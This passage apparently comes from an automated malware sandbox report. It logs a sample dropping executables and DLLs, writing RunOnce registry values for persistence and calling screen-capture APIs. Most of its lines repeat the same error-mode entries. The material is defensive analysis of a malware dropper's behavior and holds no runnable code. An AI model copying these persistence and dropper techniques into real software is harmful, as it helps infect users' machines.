                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeFile created: C:\Program Files (x86)\Company\NewProduct\F0geI.exeJump to dropped file
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeFile created: C:\Users\user\AppData\LocalLow\vcruntime140.dllJump to dropped file
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeFile created: C:\Users\user\AppData\LocalLow\sqlite3.dllJump to dropped file
                    Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
                    Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
                    Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
                    Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_00408ADD LocalAlloc,GetDesktopWindow,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,GetClientRect,SetStretchBltMode,GetSystemMetrics,StretchBlt,GetSystemMetrics,StretchBlt,SelectObject,GetObjectW,LocalAlloc,CreateFileW,CreateFileW,LocalAlloc,LocalAlloc,StrCpyW,WideCharToMultiByte,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteObject,DeleteObject,14_2_00408ADD
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
